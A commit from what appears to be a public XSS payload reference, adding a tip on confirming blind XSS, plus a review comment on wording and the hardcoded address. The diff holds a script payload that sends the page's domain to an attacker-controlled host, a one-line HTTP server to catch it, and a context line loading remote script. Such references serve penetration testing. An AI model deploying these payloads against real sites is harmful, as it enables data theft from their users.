Merge pull request #376 from noraj/patch-2

XSS: add quick tips for bXSS
Swissky 2021-06-16 13:56:29 +02:00 committed by GitHub
commit 62b897c936
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -452,6 +452,22 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu
- Comment Box
- Administrative Panel
### Tips
You can use [Data grabber for XSS](#data-grabber-for-xss) and a one-line HTTP server to confirm the existence of a blind XSS before deploying an heavy blind XSS platform.
Eg. payload
```html
<script>document.location='http://10.10.14.30:8080/XSS/grabber.php?c='+document.domain</script>
```
Eg. one-line HTTP server:
```
$ ruby -run -ehttpd . -p8080
```
## Mutated XSS
Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`.
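Review bot: The example payload under the new "Tips" heading hardcodes `10.10.14.30:8080`, which looks like an address from one lab setup, while the context line at the top of the hunk uses a placeholder-style host (`https://yoursu…`); please switch to a placeholder host and port so the tip matches the rest of the file and nobody copies a stale address. The payload also requests `/XSS/grabber.php`, but the one-line server shown is a plain file server for the current directory, so it is worth adding a sentence saying the confirmation is the incoming request in the server's log rather than anything the PHP grabber stores. Smaller points: "an heavy" should be "a heavy", "Eg." should be "E.g.", and the second fence has no language tag although the first is tagged `html`.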